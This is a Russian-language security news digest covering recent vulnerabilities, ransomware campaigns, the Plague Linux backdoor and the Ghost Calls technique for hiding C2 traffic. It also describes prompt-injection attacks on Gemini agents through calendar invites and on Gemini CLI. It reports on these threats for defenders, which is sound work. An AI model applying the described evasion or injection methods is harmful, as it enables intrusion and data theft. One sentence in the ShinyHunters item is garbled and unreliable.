Более 29 000 доступных в глобальной сети серверов Exchange остаются непротпатченными и уязвимыми для CVE-2025-53786, реализуя риски полной компрометации домена.

Уязвимость позволяет злоумышленникам с административным доступом к локальным серверам Exchange, повышать привилегии в подключенной облачной среде путем манипулирования доверенными токенами или вызовами API, не оставляя следов и не затрудняя обнаружение.

CVE-2025-53786 затрагивает Exchange Server 2016, Exchange Server 2019 и Microsoft Exchange Server Subscription Edition, которая заменяет модель бессрочной лицензии на модель на основе подписки в гибридных конфигурациях.

Уязвимость была обнаружена после того, как в апреле 2025 года Microsoft выпустила руководство и исправление для сервера Exchange в рамках своей инициативы SFI с поддержкой новой архитектуры с использованием специального гибридного приложения, заменяющего небезопасную общую идентификацию, ранее применявшуюся локальными Exchange Server и Exchange Online.

Microsoft пока не удалось обнаружить доказательства злоупотреблений при атаках, но уязвимость по-прежнему имеет отметку «эксплуатация более вероятна», что также относится к возможности появления вполне себе работающего эксплойта.

Особенно если учитывать, что, по данным Shadowserver, более 29 000 серверов Exchange до сих пор не имеют исправлений для защиты от потенциальных атак с использованием CVE-2025-53786.

Из 29098 непропатченных серверов, обнаруженных к 10 августа, более 7200 находились в США, 6700 - в Германии и более 2500 - в России.

Продолжаем отслеживать наиболее трендовые уязвимости, связанные с ними исследования и угрозы:

1. Исследователи Google улучшили атаку Retbleed по сторонним каналам CPU, увеличив скорость извлечения данных.

Retbleed была впервые раскрыта в 2022 году и позволяла извлекать данные с процессоров AMD и Intel.

Усовершенствованная атака достигает скорости 13 КБ/с (в три раза быстрее) и может работать в изолированных средах (в современных облачных средах на базе виртуальных машин с жесткими требованиями).

2. Palo Alto Networks провела собственный анализ BadSuccessor - атаки, которая использует делегированные учетные записи управляемых служб (dMSA) для повышения привилегий в средах Active Directory под управлением Windows Server 2025.

3. Исследователь PortSwigger Джеймс Кеттл представил два новых класса атак на рассинхронизацию HTTP.

Они нацелены на протокол HTTP/1.1 и позволяют раскрыть учётные данные пользователей, передаваемые через интернет.

Задействуются слабые границы между отдельными HTTP-запросами для «заражения» прокси-серверов и CDN-сетей, а также раскрытия пользовательских данных.

В настоящее время затронуты десятки миллионов сайтов.

4. Исследователи продемонстрировали возможности использования модифицированных приглашений Google Календаря для взлома агентов Gemini AI.

В них были скрыты вредоносные подсказки, предписывающие агентам выполнять вредоносные действия в отношении учётной записи пользователя.

Исследователи реализовали спам- и фишинговые атаки, определяли геолокацию жертв, крали электронные письма и удалённо управляли домашними приборами пользователя, подключенными к интернету.

Свои выводы SafeBreach представила на Black Hat после того, как Google устранила уязвимости.

5. Исследователь Sweet Security Наор Хазиз обнаружил ECScape - уязвимость, которая использует недокументированный внутренний протокол внутри AWS ECS для получения учетных данных из других задач ECS.

Sweet Security заявила, что AWS признает, что атака может быть направлена на сотен миллионов машин и контейнеров по всему миру, но облачный гигант не классифицирует её как уязвимость в своих продуктах.

Тем не менее, по результатам исследования компания обновила документацию.

6. Cisco выпустила две рекомендации по безопасности для различных продуктов.

7. Исследователи VisionSpace Technologies продемонстрировали на Black Hat, насколько легко взламать спутники, эксплуатируя уязвимости ПО как самих спутников, так и наземных станций для их управления.

Исследователи обнаружили уязвимости, которые можно эксплуатировать для вызова сбоей ПО спутника, а также показали, как хакеры могут поменять орбиту спутника, отправляя команды на двигатели.

8. Cato Networks обнаружила уязвимость в Streamlit, фреймворке с открытым исходным кодом для создания приложений в сфере обработки данных.

Ошибка позволяла осуществлять захват облачных аккаунтов.

Cato Networks продемонстрировала потенциальное воздействие, показав возможность манипуляции информационными панелями фондового рынка.

Ресерчеры Лаборатории Касперского представили свое видение актуальных трендов информационной безопасности современных автомобилей.

Современные автомобили все активнее стремятся стать полноценными гаджетами на колесах.

Расширяется и спектр разнообразных интеллектуальных систем и сервисов, обеспечивающих безопасность участников дорожного движения.

Все эти системы, призванные сделать вождение более удобным и безопасным, реализованы с помощью цифровых технологий, которые увеличивают поверхность атаки автомобиля.

Ландшафт угроз современного автомобиля определяется во многом его внутренним устройством.

С этой точки зрения автомобиль можно упрощенно представить как набор компьютеров, связанных между собой сетью передачи данных и установленных на передвижную платформу с колесами и двигателем.

Причем они не только решают вычислительные задачи во взаимодействии с пользователем через человеко-машинный интерфейс, но и управляют платформой, на которой они установлены.

Поэтому, получив удаленное управление автомобилем, злоумышленник может не только украсть данные пользователя, но и создать потенциально аварийную ситуацию на дороге. 

Однако угроза преднамеренных действий, нацеленных на функциональную безопасность автомобиля, к счастью для автовладельцев, повседневной реальностью не становится.

Во всяком случае пока, но ситуация, по всей видимости, будет меняться скоротечно.

Может ли ситуация кардинально поменяться в обозримом будущем? И что вообще такое современный автомобиль как объект информационной безопасности?

Ответы на эти и другие вопросы - в отчете на Kaspersky ICS CERT.

В SonicWall пришли к выводу, что никакой 0-day не существует, а недавние атаки Akira ransomware на межсетевые экраны Gen 7 с включенным SSLVPN полагаются на прошлогоднюю уязвимость.

Компания утверждает, что злоумышленники нацелены на CVE-2024-40766, позволяющую несанкционированный доступ, которая была исправлена в августе 2024 года (раскрыта и задокументирована в бюллетене SNWLID-2024-0015).

CVE‑2024‑40766 - критическая уязвимость управления доступом SSLVPN в SonicOS, которая позволяет осуществлять несанкционированный доступ к уязвимым конечным точкам, что позволяет злоумышленникам перехватывать сеансы или получать доступ к VPN в защищенных средах.

Уязвимость широко эксплуатировалась после ее обнаружения примерно год назад, в том числе  операторами Akira и Fog, которые использовали ее для взлома корпоративных сетей.

В пятницу Arctic Wolf Labs впервые намекнула на возможное существование 0-day в брандмауэрах SonicWall Gen 7, заметив определенные закономерности в атаках Akira.

SonicWall быстро подтвердила текущую кампанию и посоветовала клиентам отключить службы SSL VPN, также ограничить подключение доверенными IP-адресами, пока ситуация не прояснится.

После расследования более 40 инцидентов поставщик убедился в отсутствии каких-либо нулей в своих продуктах, полагая, что Akira нацеплена на конечные точки, которые не получили исправления для CVE-2024-40766 при переходе с межсетевых экранов Gen 6 на Gen 7.

Многие инциденты связаны с миграцией с межсетевых экранов Gen 6 на Gen 7, когда пароли локальных пользователей переносились во время миграции и не сбрасывались. Сброс паролей был критически важным шагом, описанным в первоначальном сообщении.

Рекомендуемым действием сейчас является обновление прошивки до версии 7.3.0 или более поздней, которая имеет более надежную защиту от подбора паролей и MFA, а также сброс всех локальных паролей пользователей, особенно тех, которые используются для SSLVPN.

Тем не менее, многие пользователи на Reddit выразили сомнения относительно достоверности заявлений поставщика, заявляя обратное по результатам собственных расследований.

Некоторые отмечают нарушения безопасности учетных записей, которых не было до перехода на межсетевые экраны Gen 7. При этом сообщая об отказе со стороны SonicWall в проверках их журналов.

Так что будем следить.

CyberArk устранила ряд серьезных уязвимостей, которые могли привести к удаленному выполнению кода без аутентификации, что потенциально позволяет злоумышленникам получить доступ к ценным корпоративным секретам.

Уязвимости были обнаружены исследователями Cyata в решении с открытым исходным кодом CyberArk Conjur.

Оно предназначено для безопасного хранения, управления и контроля доступа к учетным данным, сертификатам, ключам API и другим корпоративным секретам, используемым в облачных и DevOps-средах, которые могут представлять большую ценность для злоумышленников.

Cyata обнаружила ряд уязвимостей, в том числе позволяющих обходить аутентификацию IAM, повышать привилегии, раскрывать информацию и выполнять произвольный код.

Объединение уязвимостей в цепочку позволяет удаленному неаутентифицированному злоумышленнику выполнить произвольный код в целевой системе без необходимости ввода пароля, токена или учетных данных AWS.

Уязвимости отслеживаются как CVE-2025-49827, CVE-2025-49831 (оба обхода аутентификатора IAM), CVE-2025-49828 (удалённое выполнение кода), CVE-2025-49830 (обход пути и раскрытие файла) и CVE-2025-49829 (отсутствие проверок).

CyberArk уведомили о результатах проверки в конце мая, а 15 июля поставщик объявил о доступности исправлений. Ранее клиенты также уведомлялись в части выявленных уязвимостей и исправлений.

Под удар попали Secrets Manager от CyberArk, Self-Hosted (Conjur Enterprise) и Conjur с открытым исходным кодом.

По данным CyberArk, выявленные уязвимости не эксплуатировались в реальных условиях. Но несмотря на это, настоятельно всем пользователям рекомендуется как можно скорее установить недавно выпущенные исправления.

Помимо уязвимостей в CyberArk, исследователи Cyata расчехлили ошибки в другой широко распространенной платформе управления секретами - HashiCorp Vault.

Всего - девять уязвимостей, некоторые из которых позволяли удалённое выполнение кода и полный захват системы.

Все свои выводы Cyata представила в среду на Black Hat, раскрыв соответствующие технические подробности у себя в блоге.

Новый метод проксирования и маскировки каналов C2 под названием Ghost Calls задействует серверы TURN, используемые приложениями для ВКС (прежде всего, Zoom и Microsoft Teams) для туннелирования трафика через доверенную инфраструктуру.

Ghost Calls использует легальные учетные данные, WebRTC и специальные инструменты для обхода большинства существующих мер защиты и противодействия злоупотреблениям, не прибегая к эксплойтам.

Новую тактику раскрыл исследователь из Praetorian Адам Кроссер на конференции BlackHat USA, отметив, что технология может теперь использоваться Red Team в проведении пентестов.

Кроссер отметило, что используя протоколы веб-конференций, которые разработаны для общения в реальном времени с малой задержкой и работают через глобально распределенные медиасерверы, реализуется функция естественных ретрансляторов трафика.

Этот подход позволяет операторам интегрировать интерактивные сеансы C2 в обычные схемы корпоративного трафика, представляя их всего лишь как временно активную онлайн-конференцию.

TURN (обход с использованием реле в обход NAT) - сетевой протокол, обычно используемый службами видеозвонков, VoIP и WebRTC, который помогает устройствам за брандмауэрами NAT взаимодействовать друг с другом, когда прямое соединение невозможно.

Когда клиент Zoom или Teams присоединяется к ВКС, он получает временные учетные данные TURN, которые Ghost Calls может перехватить, чтобы настроить туннель WebRTC на основе TURN между злоумышленником и жертвой.

Затем этот туннель можно использовать для проксирования произвольных данных или маскировки трафика C2 под обычный трафик видеоконференций через доверенную инфраструктуру, используемую Zoom или Teams.

Поскольку трафик маршрутизируется через легитимные домены и IP-адреса, широко используемые в корпоративной среде, вредоносный трафик может обойти межсетевые экраны, прокси-серверы и проверку TLS.

Кроме того, трафик WebRTC зашифрован, поэтому надёжно скрыт.

Злоупотребляя этими инструментами, злоумышленники также избегают раскрытия своих собственных доменов и инфраструктуры, получая высокопроизводительное, надежное подключение и гибкость использования как UDP, так и TCP через порт 443.

Для сравнения, традиционные механизмы C2 достаточно медленные, заметные и часто не обладают возможностями обмена в реальном времени, необходимыми для обеспечения операций VNC.

Исследования Кроссера привели также к разработке пользовательской утилиты с открытым исходным кодом (доступна на GitHub) под названием TURNt, которую можно использовать для туннелирования трафика C2 через серверы WebRTC TURN, предоставляемые Zoom и Teams.

TURNt состоит из двух компонентов: контроллера, работающего на стороне злоумышленника, и реле, развернутого на скомпрометированном хосте.

Контроллер использует прокси-сервер SOCKS для приема подключений, проходящих через TURN. Relay подключается к контроллеру, используя учётные данные TURN, и настраивает канал передачи данных WebRTC через TURN-сервер провайдера.

TURNt может выполнять проксирование SOCKS, локальную или удаленную переадресацию портов, кражу данных и обеспечивать скрытое туннелирование трафика VNC.

Разработчики Zoom или Microsoft Teams пока никак не комментируют результаты исследования и не ясно будут ли с их стороны предприниматься какие-либо меры безопасности (учитывая, что Ghost Calls не базируется на уязвимостях в продуктах).

Вслед за Cisco Google стала последней в цепочке жертв волны атак, связанных с компрометацией Salesforce CRM, за которой стоит банда вымогателей ShinyHunters.

В июне Google сообщала, что злоумышленник UNC6040 атакует сотрудников компаний с помощью вишинга и социнженерии, пытаясь взломать экземпляры Salesforce и выкрасть данные клиентов с вымогательства выкупа.

В обновлении своего уведомления Google отразила, что в июне она тоже стала жертвой той же атаки, когда один из ее экземпляров корпоративной системы Salesforce CRM был взломан с использованием аналогичной уязвимости UNC6040, а данные клиентов были украдены.

Google оперативно отреагировала на эту активность, провела анализ воздействия и начала принимать меры по смягчению последствий.

Конкретная Salesforce CRM использовалась для хранения контактной информации и сопутствующих заметок для бизнес-пользователей.

Анализ показал, что данные были извлечены злоумышленником в течение ограниченного промежутка времени, прежде чем доступ был залочен.

Google отслеживает злоумышленников, стоящих за этими атаками, как UNC6040 или UNC6240, в киберподполье они известны как ShinyHunters.

Группировка орудует уже не один год и несет ответственность за целый ряд инцидентов, включая атаки наей ShinyHunters.

В июне Google сообщала, что злоумышленник UNC6040 и многие другие.

Как заявляют представители ShinyHunters, реализована целая кампания, по результатам которой им удалось отработать множество экземпляров Salesforce, при этом атаки все еще продолжаются.

Особо отмечено, что вчера злоумышленники взломали компанию стоимостью триллион долларов, данные которой хакеры намерены слить без требования выкупа.

Но пока неясно, идет ли речь о Google.

В отношении других компаний злоумышленники вымогают кеш через электронную почту, требуя выкуп за предотвращение публичной утечки данных, обещая при этом в случае срыва диалога реализовать данные через даркнет.

В целом, жертвами новой кампании ShinyHunters уже стали Adidas, Qantas, Allianz Life, Cisco и LVMH  Louis Vuitton, Dior и Tiffany & Co.

Причем одна из них уже перечислила 4 биткоина (около 400 000 долл.) на счета банды.

Nvidia по наводке исследователей Wiz устранила более десятка уязвимостей в Triton Inference Server, включая те, которые создавали серьезные риски для систем ИИ, базирующихся на решениях поставщика.

В представленном бюллетене Nvidia сообщила, что в Triton Inference Server открытым исходным кодом, позволяющем пользователям развертывать любые модели ИИ из различных фреймворков глубокого и машинного обучения, было устранено более десятка уязвимостей.

При этом исследователи Wiz отметили CVE-2025-23319, CVE-2025-23320 и CVE-2025-23334, которые удаленный неаутентифицированный злоумышленник может объединить в цепочку для выполнения произвольного кода и получения полного контроля над сервером.

CVE-2025-23319 и CVE-2025-23320 представляют собой уязвимости высокого уровня серьёзности и затрагивают бэкенд Python сервера Triton Inference Server для Windows и Linux.

Первая уязвимость может быть использована для удалённого выполнения кода, DoS-атак, подмены данных или раскрытия информации, последнее - достигается также с использованием второй CVE.

Третьей уязвимости CVE-2025-23334 присвоен средний уровень серьёзности.

Она также затрагивает бэкенд Python и может привести к раскрытию информации.

По данным Wiz, цепочка эксплойтов начинается с незначительной утечки информации и перерастает в полную компрометацию системы. Все проблемы устранены в версии 25.07.

В совокупности ошибки реализуют критические риски для организаций, использующих Triton для ИИ/МО, поскольку успешная атака может привести к краже моделей ИИ, раскрытию конфиденциальных данных, манипулированию ответами модели ИИ и созданию плацдарма для более глубокого проникновения в сеть.

Несмотря на отсутствие доказательств того, что какие-либо из этих уязвимостей были использованы в реальных условиях, пользователям рекомендуется установить последние обновления для оптимальной защиты.

Google выпустила исправления для шести уязвимостей в рамках обновлений безопасности Android за август 2025 года, включая две уязвимости Qualcomm, которые фигурировали в целевых атаках.

Они отслеживаются как CVE-2025-21479 и CVE-2025-27038, были обнаружены и раскрыли специалистами Google еще в конце января 2025 года.

Тогда Google Threat Analysis Group упоминали о получении сообщений в отношении их ограниченной таргетированной эксплуатации.

Первая из них - это некорректная авторизация графического фреймворка, которая может привести к повреждению памяти из-за несанкционированного выполнения команд в микроузле графического процессора при выполнении определённой последовательности команд.

CVE-2025-27038, с другой стороны, представляет собой уязвимость использования памяти после освобождения, которая приводит к повреждению памяти при рендеринге графики с использованием драйверов графического процессора Adreno в Chrome.

Исправления проблем, затрагивающих драйвер графического процессора Adreno (GPU), были разработаны OEM-производителям в мае вместе с настоятельной рекомендацией как можно скорее установить обновление на затронутых устройствах, а Google ретранслировала их в свои.

В представленных обновлениях Android Google также устранила критическую уязвимость в компоненте System, которую злоумышленники без привилегий могут использовать для RCE в сочетании с другими уязвимостями в атаках, не требующих взаимодействия с пользователем.

Традиционно Google выпустила два набора исправлений безопасности: от 01.08.2025 и 05.08.2025.

Последний включает в себя все исправления из первого набора, а также для компонентов ядра и сторонних разработчиков с закрытым исходным кодом, которые могут применяться не ко всем устройствам Android.

В ответ на обвинения в причастности к кампании, связанной с 0-day в Microsoft SharePoint, китайская сторона предъявила штатам попытки внедрения бэкдоров в чипы NVIDIA, а также участие во взломе национальных военных объектов в целях шпионажа через майкрософтовские нули.

Свои опасения относительно потенциальных угроз выразили представители Управления по вопросам киберпространства Китая (CAC).

Вызвав на ковер оппонентов из NVIDIA китайцы потребовали предоставить исчерпывающие пояснения относительно реализации положений нового Закона США о безопасности чипов (Chip Security Act), по которому в поставляемую в КНР продукцию могут быть внедрены бэкдоры.

В случае принятия законопроект обяжет NVIDIA оснащать чипы системой отслеживания, предотвращающей их продажу в недружественные или находящиеся под санкциями страны.

Заявленная система отслеживания также должна будет включать в себя функции удалённого отключения, которая деактивируется, если чипы окажутся в соответствующей подсанкционной юрисдикции.

Конкретно речь идет о серии H20, которую NVIDIA разработала и выпустила специально для того, чтобы обойти экспортный контроль США и при этом иметь возможность продавать свою продукцию в Китай.

Дабы подкрепить оценки относительно перспектив угроз кибершпионажа уже на следующий день CAC совместно со своей CERT выдвинула новые серьезные обвинения, заявляя о причастности американских спецслужб к атаке на крупное военное предприятие в июне 2022.

Предполагается, что американские APT взломали более 300 систем, используя неназванную 0-day Exchange, которая позволила им закрепиться в сети жертвы и красть конфиденциальные засекреченные данные на протяжении почти года.

Неужели EternalBlue и слив инструментария Lamberts ничему их так не научил.

В общем, никогда такого не было и вот опять!

Более года в системах Linux скрывалось вредоносное ПО, которое позволяло злоумышленникам получать постоянный доступ по протоколу SSH и обходить аутентификацию.

Обнаружившие малварь исследователи Nextron Systems назвали его Plague и охарактеризовали как вредоносный подключаемый модуль аутентификации (PAM), который использует методы многоуровневой обфускации для уклонения от обнаружения.

Вредоносная ПО обладает возможностями противодействия отладке, препятствующими попыткам анализа и реверса, обфускацией строк для усложнения обнаружения, жестко запрограммированными паролями для скрытого доступа, а также способностью скрывать артефакты сеанса.

После загрузки он зачищает среду выполнения от любых следов своей вредоносной активности, в том числе в части связанных с SSH переменных среды и истории команд, журналирования, метаданных входа в систему и интерактивных сеансов.

Plague глубоко интегрируется в стек аутентификации, переживает обновления системы и практически не оставляет криминалистических следов.

В сочетании с многоуровневой обфускацией и вмешательством в среду это делает его исключительно сложным для обнаружения с помощью традиционных инструментов.

Вредоносное ПО активно дезинфицирует среду выполнения. Переменные среды, такие как SSH_CONNECTION и SSH_CLIENT, сбрасываются с помощью unsetenv, а HISTFILE перенаправляется в /dev/null для предотвращения регистрации команд оболочки.

При анализе вредоносного ПО исследователи также обнаружили артефакты компиляции, указывающие на активную разработку в течение длительного периода, с использованием различных версий GCC в различных дистрибутивах Linux.

Несмотря на то, что за последний год на VirusTotal было загружено несколько вариантов бэкдора, ни один из антивирусных движков не пометил их как вредоносные: создатели вредоносного ПО долгое время действовали незамеченными.

Собственно поэтому исследователи считают Plague сложной и прогрессирующей угрозой для инфраструктуры Linux, задействующей основные механизмы аутентификации для обеспечения скрытности и устойчивости.

Использование продвинутой обфускации, статических учётных данных и вмешательства в среду делает его особенно сложным для обнаружения традиционными методами.

Исследователи Bitdefender обнаружили исправленные критические уязвимости в прошивках умных камер Dahua, которые позволяют злоумышленникам перехватывать управление уязвимыми устройствами.

Уязвимости затрагивают протокол ONVIF и обработчики загрузки файлов, позволяя неавторизированным злоумышленникам удаленно выполнять произвольные команды.

Проблемы отслеживаются как CVE-2025-31700 и CVE-2025-31701 (CVSS: 8,1) и влияют на следующие устройства с версиями до 16 апреля 2025 года: IPC-1XXX, IPC-2XXX, IPC-WX, IPC-ECXX, SD3A, SD2A, SD3D, SDT2A и SD2C Series.

Оба недостатка относятся ошибкам переполнения буфера и эксплуатируются путем отправки специально созданных вредоносных пакетов, что потенциально приводит к DoS или RCE.

В частности, CVE-2025-31700 описывается как переполнение стека буфера в обработчике запросов ONVIF (Open Network Video Interface Forum), тогда как уязвимость CVE-2025-31701 касается ошибки переполнения в обработчике загрузки файлов RPC.

Как отмечает Dahua, некоторые устройства имеют защитные механизмы, в том числе рандомизацию адресного пространства (ASLR), что снижает вероятность успешного использования RCE.

Однако атаки типа DoS по-прежнему вполне реализуемы.

В свою очередь, Bitdefender предупреждает, что устройства, подключенные к интернету через переадресацию портов или UPnP, особенно подвержены риску, а успешная эксплуатация обеспечивает доступ к камере с правами root без взаимодействия с пользователем.

При этом эксплойт обходит проверки целостности прошивки, так что злоумышленники могут загружать неподписанные полезные нагрузки или сохраняться через пользовательские демоны, что затрудняет очистку.

Учитывая, что устройства Dahua популярны, в том числе и в России, пользователям следует внимательно отнестись к рекомендациям поставщика и накатить соответствующие обновления.

В Google сообщили, что не получали запроса на создание секретного бэкдора от правительства Великобритании (via).

Потому что зачем делать новый, если старый работает неплохо!

🥷❗️F6: новый игрок на рынке RaaS с прицелом на Россию

Аналитики Threat Intelligence F6 изучили вымогательский сервис Pay2Key, который распространяется на киберпреступных русскоязычных форумах по модели RaaS с конца февраля 2025 года.

С начала 2025 года на теневых форумах активизировался новый вымогательский сервис Pay2Key, распространяемый как RaaS (Ransomware as a Service) и построенный на базе известного шифровальщика Mimic. Из особенностей сервиса стоит отметить то, что он доступен только в сети аналогичной TOR — I2P:

Несмотря на негласные правила, запрещающие атаки по СНГ, партнеры проекта Pay2Key уже попытались поразить российские компании из сфер финансов, строительства и ритейла — весной было обнаружено как минимум три фишинговые кампании, нацеленные на российских пользователей. Сервис работает в анонимной сети I2P (Invisible Internet Project), а в арсенале атакующих — SFX-архивы, фишинг, легитимные утилиты и продвинутые способы обхода антивирусной защиты.
....

Программа-вымогатель Pay2Key является отдельной ветвью развития (форком) другого распространенного шифровальщика – Mimic. По нашему мнению, программа-вымогатель Mimic является одной из самых сложных современных программ-вымогателей. В феврале распространялась программа Pay2Key версии 1.1, на настоящий момент актуальной является версия 1.2.

— сообщают специалисты F6.

🔐 Примечательно то, что противодействия детектированию средствами защиты и анализу шифровальщик Pay2Key защищен протектором Themida.

⚙️Механика заражения и поведение 🔒 шифровальщика:

В одном из апрельских рассылок, направленных на 🇷🇺 российские фин.организации, можно увидеть, что отправитель письма — pyypl329@gmail[.]com, однако, проверив заголовки — письмо было отправлено с адреса mail-ed1-f51[.]google[.]com. То есть злоумышленник использовал веб-интерфейс почты gmail, либо сервера google для отправки почты по протоколу SMTP.

📧 Тема письма: «Коммерческое предложение по инвестированию в МФО».

👆Письмо содержит ссылку на DropBox, по которой на устройство жертвы загружается файл с именем «NexCall коммерческое предложение для рынка МФО России.exe». Загружаемый файл являлся SFX архивом, содержащим 5 больших зашифрованных файлов и командный установочный файл.

🥷Стоимость расшифровки для исследуемой жертвы составила💸 2499$.

Аналитиками F6 были также обнаружены и другие фишинговые рассылки, нацеленные на российских пользователей, в них программа-вымогатель доставлялась непосредственно в прикрепленном RAR-архиве вместо ссылки на DropBox. После открытия архива в системе пользователя запускается шифровальщик Pay2Key.

https://detonation.f6.security/zynKyL3OcxmvczH4SJ8684wld/ru

✋ @Russian_OSINT

Исследователи из Лаборатории Касперского в новом отчете раскрывают все более сложные и хитрые методы, которые применяют злоумышленники для сокрытия уже давно известных инструментов.

Во второй половине 2024 года российский IT-сектор стал объектом достаточно интересной атаки, нацеленной, преимущественно на крупные и средние отраслевые компании.

При этом следы злоумышленников удалось также найти в Китае, Японии, Малайзии и Перу.

Злоумышленники применили целый спектр вредоносных техник, чтобы обмануть системы безопасности и остаться незамеченными.

В частности, для обхода обнаружения они доставляли информацию о вредоносной нагрузке через профили в соцсетях, а также на других популярных ресурсах, где пользователи могут делиться контентом.

В частности, исследованные образцы обращались к GitHub, Microsoft Learn Challenge, Quora, а также русскоязычным соцсетям.

Атакующие таким образом старались скрыть свою активность и создать сложную цепочку выполнения давно известного и широко распространенного инструмента - Cobalt Strike Beacon.

Применяли также технику DLL Hijacking, которая становится все более популярна в киберподполье.

Несмотря на то, что пик атак пришелся на ноябрь-декабрь 2024 года, угроза сохраняла актуальность до конца апреля 2025-го.

При этом после нескольких месяцев тишины в июле исследователи ЛК стали вновь детектировать эту активность.

Злоумышленники использовали новые незначительно модифицированные вредоносные образцы.

Как удалось заметить, схема получения адреса, с которого загружается шелл-код, схожа со схемой получения С2, которая наблюдалась в кампании EastWind.

В обоих случаях URL-адрес содержится в специально созданном профиле на легитимной площадке, такой как Quora или GitHub.

Также в обоих случаях он зашифрован по алгоритму XOR.

Частично совпадают и цели двух кампаний: злоумышленников интересуют именно российские IT-компании.

Техническая часть и IOC - в отчете.

Исследователи GreyNoise обнаружили, что примерно в 80% случаев всплески вредоносной активности предшествуют появлению новых уязвимостей в течение последующих шести недель.

В компании полагают, что подобные явления не случайны, а характеризуются цикличными и статистически обусловленными закономерностями.

В основе выводов GreyNoise - аналитика на базе данных Глобальной сети наблюдений (GOG), собираемых с сентября 2024 года с применением объективных статистических пороговых значений, исключающих выборочного искажения результатов.

После фильтрации лишних данных компания отследила 216 событий, которые были квалифицированы как всплески активности, связанные с восемью поставщиками корпоративных периферийных устройств.

Из всех 216 изученных скачков активности в 50 процентах в течение последующих трех недель наблюдался новый CVE, а в 80 процентах - в течение шести.

Данная корреляция особенно сильно затрагивала решения Ivanti, SonicWall, Palo Alto Networks и Fortinet и слабее для MikroTik, Citrix и Cisco, которые неоднократно становились объектами APT-атак и выступали основой для первоначального доступа.

GreyNoise отмечает, что в большинстве выявленных скачков вредной активности злоумышленники задействовали эксплойты для уже известных уязвимостей.

Исследователи полагают, что это либо способствует обнаружению новых уязвимостей, либо идентификации конечных точек, доступных через Интернет, которые могут стать целью на последующем этапе атаки с использованием новых эксплойтов.

Как правило, реагирование реализуется после публикации CVE, но результаты GreyNoise демонстрируют, что поведение злоумышленника может быть опережающим индикатором для организации проактивной защиты.

Описанные в отчете всплески, предшествующие раскрытию информации, могут быть служить сигналом для подготовки к потенциальной атаке безотносительно конкретных проблем и систем, которые они затрагивают.

GreyNoise рекомендует внимательно отслеживать активность сканирования и оперативно блокировать исходные IP-адреса, поскольку это исключает их из процесса разведки, который обычно впоследствии приводит к реальным атакам.

Поэтому, как подчеркивают исследователи, не следует игнорировать сканирования старых уязвимостей (попытки которых предпринимаются злоумышленниками для каталогизации уязвимых активов) и списывать их на неудачные попытки взлома полностью пропатченных конечных точек.

Apple выкатила исправления для десятков уязвимостей в своих операционных системах, в том числе для эксплуатируемой в реальных условиях ошибки.

Она отслеживается как CVE-2025-6558 и была раскрыта в середине июля, когда Google исправила ее в Chrome, выразив благодарность за ее обнаружения своей команде TAG и предупреждая о ее задействовании в качестве 0-day.

Ошибка связана с недостаточной проверкой ненадежных входных данных в графических компонентах Chrome ANGLE и GPU, которая может быть использована удаленно с помощью специально созданных HTML-страниц для выхода за пределы «песочницы» браузера.

Спустя неделю после того, как Google выпустила обновление Chrome 138, CISA добавила ошибку в свой каталог известных эксплуатируемых уязвимостей KEV. Правда, до сих пор не было ни одного отчета об атаках с использованием CVE-2025-6558.

В обновлениях для iOS и macOS Apple также представила исправления для CVE-2025-6558, которая влияет на WebKit и может привести к сбою Safari при посещении страницы с вредоносным контентом.

Но никаких свидетельств того, что эта уязвимость была использована в Safari пока нет.

В общей Apple выпустила исправления для 13 уязвимостей безопасности в WebKit, предупредив о возможности их задействования для XSS-атак, раскрытия конфиденциальной пользовательской информации, повреждения памяти, сбоя Safari или вызова состояния DoS.

Помимо WebKit другие компоненты платформы Apple также были улучшены, избавившись от значительного объема уязвимостей. В их числе: AppleMobileFileIntegrity, Model I/O и PackageKit.

Ещё одной заслуживающей внимания уязвимостью является CVE-2025-43223, которая затрагивает компонент CFNetwork в macOS и iOS, позволяя непривилегированным пользователям изменять ограниченные сетевые настройки.

CFNetwork Apple - это фреймворк, обеспечивающий сетевое взаимодействие, включая HTTP, HTTPS и другие протоколы. Поэтому любая уязвимость в фреймворке создаёт значительные риски безопасности.

В общем, Apple исправила 87 CVE в новом обновлении macOS Sequoia 15.6 и включила исправления для 29 уязвимостей в недавно выпущенные обновления iOS 18.6 и iPadOS 18.6.

В macOS Sonoma 14.7.7 исправлено 50 ошибок, в macOS Ventura 13.7.7 - 41 проблема, в iPadOS 17.7.9 - 19 ошибок, в watchOS 11.6 - 21 ошибка, а в tvOS 18.6 и visionOS 2.6 - по 24 ошибки.

Так что пользователям настоятельно рекомендуется как можно скорее обновить свои девайсы.

Исследователи Binarly предупредили об уязвимостях в устройствах Lenovo, которые позволяют повышать привилегии, выполнять код и обходить защиту, а также внедрять импланты в целевые системы.

В общей сложности было найдено шесть уязвимостей в BIOS Insyde моноблоков Lenovo IdeaCentre и Yoga, в частности в режиме управления системой SMM - режиме работы, предназначенном для низкоуровневого управления системой.

Поскольку SMM загружается до ОС и сохраняется после переустановки, это делает его идеальной целью для атак, нацеленных на обход безопасной загрузки и внедрения скрытого вредоносного ПО.

Уязвимостям присвоены идентификаторы CVE от CVE‑2025‑4421 до CVE‑2025‑4426. Четыре из них имеют высокий уровень серьезности, остальные - средний.

Уязвимости с высоким CVSS связаны с повреждением памяти, которое может привести к EoP и RCE в SMM.

Уязвимости среднего уровня серьёзности могут привести к раскрытию информации и обходу механизмов безопасности.

Злоумышленники, имеющие привилегированный доступ к целевому устройству Lenovo, могут воспользоваться уязвимостями для обхода средств защиты флэш-памяти SPI и SecureBoot, нарушения изоляции гипервизора и внедрения имплантов, которые сохранят работоспособность даже после переустановки. 

Исследователи Binarly уведомили Lenovo об ошибках еще в апреле, поставщик подтвердил их наличие только в июне, выпустив к настоящему времени исправления только для продуктов IdeaCenter, обновления для Yoga - еще в работе.

И Lenovo, и Binarly также представили рекомендации по безопасности с описанием выявленных уязвимостей (1 и 2 соответственно).

Уязвимость в Gemini CLI от Google позволяла злоумышленникам незаметно выполнять вредоносные команды и похищать данные с компьютеров разработчиков.

Ошибка была обнаружена Tracebit 27 июня, а исправления для нее стали доступны в версии 0.1.14, вышедшей 25 июля.

Gemini CLI, впервые выпущенный 25 июня 2025 года, представляет собой инструмент командной строки, разработанный Google, который позволяет разработчикам напрямую взаимодействовать с Gemini AI через терминал.

Инструмент способен выдавать рекомендации, писать код и даже выполнять команды локально, либо предварительно запрашивая разрешение у пользователя, а также используя механизм списка разрешенных действий.

Исследователи Tracebit сразу после его выпуска обнаружили, что Gemini CLI можно обманным путём заставить выполнить вредоносные команды.

В сочетании с уязвимостями пользовательского интерфейса эти команды могут привести к скрытым атакам на выполнение кода.

